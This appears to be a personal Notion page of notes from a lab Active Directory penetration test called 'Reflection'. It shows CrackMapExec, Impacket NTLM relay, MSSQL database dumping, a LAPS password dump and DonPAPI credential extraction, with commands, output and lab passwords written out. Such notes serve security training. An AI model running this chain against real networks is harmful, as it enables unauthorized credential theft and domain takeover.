Refleciton | Notion

Anonymous SMB share on MS01

user=web_staging
password=Washroom510
db=staging

Creds work to access mssql.

┌──(root㉿kali)-[/home/kali/reflection]
└─# cme mssql 10.10.148.149-151 -u web_staging -p Washroom510 --local-auth
MSSQL       10.10.148.149   1433   DC01             [*] Windows 10.0 Build 20348 (name:DC01) (domain:DC01)
MSSQL       10.10.148.150   1433   MS01             [*] Windows 10.0 Build 20348 (name:MS01) (domain:MS01)
MSSQL       10.10.148.149   1433   DC01             [-] ERROR(DC01\\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       10.10.148.150   1433   MS01             [+] web_staging:Washroom510

nothing interesting in the db, but we can relay since signing disabled

impacket-ntlmrelayx -t smb://10.10.148.149 -smb2support -i

gives us more db creds. now we can hit prod on DC

user=web_prod
password=Tribesman201
db=prod

┌──(root㉿kali)-[/home/kali/reflection]
└─# impacket-mssqlclient web_prod:[email protected]                                            
Impacket v0.9.24 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> use prod
s[*] ENVCHANGE(DATABASE): Old Value: master, New Value: prod
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed database context to 'prod'.
SQL> select * from users;
id   name              password            
--   ---------------   -----------------   
 1   b'abbie.smith'    b'CMe1x+nlRaaWEw'   

 2   b'dorothy.rose'   b'hC_fny3OK9glSJ'

bloodhound shows abbie has genericall on ms01

Untitled

Means we can dump laps

cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps

Georgia price dpapi

DonPAPI ms01/Administrator:'H447.++h6g5}xi'@10.10.148.150

[CREDENTIAL]
LastWritten : 2023-06-07 19:22:44
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x2 (CRED_PERSIST_LOCAL_MACHINE)
Target      : Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370}
Description : 
Unknown     : 
Username    : REFLECTION\\Georgia.Price
Unknown3     : DBl+5MPkpJg5id

we have genericall on ws01

Not work